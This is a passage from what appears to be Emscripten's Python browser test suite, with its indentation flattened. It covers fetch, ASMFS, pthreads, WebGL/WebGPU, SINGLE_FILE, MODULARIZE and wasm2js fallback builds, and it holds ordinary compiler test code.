for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-s', 'ASSERTIONS', '--closure=1'], ['-s', 'MAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-s', 'USE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-s', 'ASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-s', 'USE_WEBGPU'] + args)
# Tests the feature that the shell html page can preallocate the typed array and place it
# in Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
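# Sketch of a fetch that keeps the response bytes in memory only (illustration only; callback
# names are hypothetical), using the emscripten_fetch API from <emscripten/fetch.h>:
#
#   #include <emscripten/fetch.h>
#   #include <string.h>
#
#   static void on_success(emscripten_fetch_t *fetch) { emscripten_fetch_close(fetch); }
#   static void on_error(emscripten_fetch_t *fetch)   { emscripten_fetch_close(fetch); }
#
#   void start_download(void) {
#     emscripten_fetch_attr_t attr;
#     emscripten_fetch_attr_init(&attr);
#     strcpy(attr.requestMethod, "GET");
#     attr.attributes = EMSCRIPTEN_FETCH_LOAD_TO_MEMORY;  // keep the bytes in memory, no IndexedDB persistence
#     attr.onsuccess = on_success;
#     attr.onerror = on_error;
#     emscripten_fetch(&attr, "gears.png");
#   }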
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when the user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly assumed.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.cpp', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.cpp', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs/hello_file.txt'), Path('dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs/hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest_exit('cstdio/test_remove.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest_exit('dirent/test_readdir.c', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest_exit('dirent/test_readdir_empty.c', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd/close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd/access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd/unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest_exit('fcntl/test_fcntl_open.c', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
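# Sketch of the html5.h calls in question (illustration only); both return an EMSCRIPTEN_RESULT
# code:
#
#   #include <emscripten/html5.h>
#
#   int w = 0, h = 0;
#   emscripten_set_canvas_element_size("#canvas", 640, 480);
#   emscripten_get_canvas_element_size("#canvas", &w, &h);  // w == 640, h == 480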
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
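# Sketch of the timing pattern this relies on (illustration only): emscripten_get_now() returns
# milliseconds measured against a single epoch shared by all threads, so deltas computed on
# different threads are comparable:
#
#   #include <emscripten.h>
#
#   double t0 = emscripten_get_now();
#   /* ... work, possibly on another thread ... */
#   double elapsed_ms = emscripten_get_now() - t0;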
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-s', 'FORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-s', 'USE_PTHREADS', '-s', 'EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# we also eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-gsource-map', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in the VM and try again; it should still work with the Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
